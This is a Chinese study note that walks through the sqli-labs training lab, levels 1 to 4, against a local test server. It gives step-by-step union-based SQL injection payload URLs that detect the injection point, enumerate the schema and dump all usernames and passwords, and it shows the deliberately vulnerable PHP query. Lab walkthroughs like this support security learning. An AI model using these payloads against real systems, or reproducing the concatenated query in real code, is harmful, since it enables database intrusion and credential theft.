sqli-labs闯关笔记-less1-20
环境准备
打开Less-1中index.php文件,在第29行$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";后面添加如下两行:
echo $sql; 打印输出的sql语句
echo "
"; 打印换行符
其他关卡同样在index.php文件添加这两句调试使用。
数据库介绍
此项目数据库使用的库名是security。库表使用的是users。关卡的目标是拿到users数据表的全部账号密码值。
mysql> show tables;
+--------------------+
| Tables_in_security |
+--------------------+
| emails |
| referers |
| uagents |
| users |
+--------------------+
4 rows in set (0.00 sec)
mysql> select * from users;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
+----+----------+------------+
13 rows in set (0.00 sec)
less-1——基于单引号的字符型注入
less-1源文件重要语句:
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
闯关思路:(注释代码-- 后面是有空格的-- 。)
1、查看是否有注入,在语句后面输入单引号会引起界面报错,与正常界面不同,如果报错证明路径存在注入点,根据错误提示判断属于何种注入。
http://127.0.0.1/sqli-labs/Less-1/?id=1'
2、查看有多少列,order by语句查询该数据表的字段数量,ORDER BY 语句用于根据指定的列对结果集进行排序。可以理解为order by=1-99,按照二分法进行猜测。如第一次99,第二次50,第三次25,逐步猜解。当超过查询的表的字段时,界面会报错。
http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 3--
3、查看哪些数据可以回显,union select用来合并两个或多个 SELECT 语句的结果集。id=-1代表不存在的值,不显示前面半截查询的语句。
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3--
4、查看当前数据库
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,database() --
5、查看数据库security
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --
6、查表,table_schema=0x7365637572697479,数据库名是security,0x7365637572697479是security的十六进制。
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--
7、查询列信息,table_name=0x7573657273,表名是users,0x7573657273是users的十六进制。
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--
8、查询字段数据,其中concat_ws(0x7e,username,password)中0x7e为波浪线~,用的是十六进制。
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users--
截图:
1、查看是否有注入
http://127.0.0.1/sqli-labs/Less-1/?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
2、查看有多少列,经过测试有3列。
http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 99--
http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 3--
3、查看哪些数据可以回显
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3--
4、查看当前数据库
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,database() --
5、查看数据库security
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --
6、查表,table_schema=0x7365637572697479,数据库名是security,0x7365637572697479是security的十六进制。
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--
7、查询列信息,table_name=0x7573657273,表名是users,0x7573657273是users的十六进制。
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--
8、查询字段数据
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users--
less-2——布尔型注入
1、查看是否有注入点
http://127.0.0.1/sqli-labs/Less-2/?id=1'
SELECT * FROM users WHERE id=1' LIMIT 0,1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1
从sql报错可以看出布尔型注入,与less1的区别是1不需要用单引号关闭。
依据闯关1的思路按照下面语句逐步执行。
1、http://127.0.0.1/sqli-labs/Less-2/?id=1'
2、http://127.0.0.1/sqli-labs/Less-2/?id=1 order by 3--
3、 http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,3--
4、http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,database()--
5、 http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata--
6、http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--
7、 http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--
8、 http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users--
less-3——基于’)的字符型注入
判断注入点
SELECT * FROM users WHERE id=('1'') LIMIT 0,1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line
接下来和less1和less2思路一样,不再赘述,最后查询用户名、密码语句如下:
http://127.0.0.1/sqli-labs/Less-3/?id=-1') union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users--
less-4——基于")字符型注入
输入单引号界面没有报错。
http://127.0.0.1/sqli-labs/Less-4/?id=1'
输入双引号界面报错。
http://127.0.0.1/sqli-labs/Less-4/?id=1"
SELECT * FROM users WHERE id=("1"") LIMIT 0,1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1
输入 ")闭合参数。
http://127.0.0.1/sqli-labs/Less-4/?id=1") --
同less1、2、3,按照下列语句顺序可得出最终的账号密码。
http://127.0.0.1/sqli-labs/Less-4/?id=1"
http://127.0.0.1/sqli-labs/Less-4/?id=1")--
http://127.0.0.1/sqli-labs/Less-4/?id=1") order by 3--
http://127.0.0.1/sqli-labs/Less-4/?id=-1") union select 1,2,3--
http://127.0.0.1/sqli-labs/Less-4/?id=-1") union select 1,2,database()--
http://127.0.0.1/sqli-labs/Less-4/?id=-1") union select 1,2,group_concat(schema_name) from information_schema.schemata--
http://127.0.0.1/sqli-labs/Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--
http://127.0.0.1/sqli-labs/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--
http://127.0.0.1/sqli-labs/Less-4/?id=-1") union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users--